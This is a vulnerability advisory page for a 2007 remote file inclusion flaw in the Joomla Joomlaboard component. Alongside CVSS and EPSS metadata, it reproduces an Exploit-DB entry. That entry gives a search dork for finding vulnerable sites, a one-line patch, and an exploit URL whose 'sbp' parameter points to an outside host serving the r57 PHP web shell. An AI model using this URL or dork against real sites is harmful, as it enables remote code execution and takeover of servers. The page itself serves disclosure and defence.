Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
CWE Other |
No informations. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.8 |
|
AV:N/AC:M/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 3560
Publication date : 2007-03-22 23h00 +00:00
Author : Cold Zero
EDB Verified : Yes
######################################################
#
# Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabilities
# Joomlaboard Component 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabilities
#
######################################################
#
# script : http://forge.joomla.org/sf/frs/do/viewRelease/projects.simpleboard/frs.joomlaboard_component.joomlaboard_1_1_x_branch
#
######################################################
#
# files : /image_upload.php , /file_upload.php ,
#
######################################################
#
# Dork : index2.php?option=com_joomlaboard , allinurl:"com_joomlaboard"
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell Crew
#
######################################################
#
# require_once("$sbp/sb_helpers.php");
# require_once("$sbp/sb_helpers.php");
#
######################################################
#
# exploit : http://www.example.com/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://nachrichtenmann.de/r57.txt?
# http://www.example.com/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://nachrichtenmann.de/r57.txt?
#
######################################################
#
# How To Fix It : U can put this code - defined( '_VALID_MOS' ) or die( 'Catch Me iF u Can ### Patched By Cold z3ro .' ); - after <?php code start
#
######################################################
#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine
# milw0rm.com [2007-03-23]
Products Mentioned
Configuraton 0
Joomlaboard>>Joomlaboard >> Version To (including) 1.1.1
Joomla>>Joomla\! >> Version *
References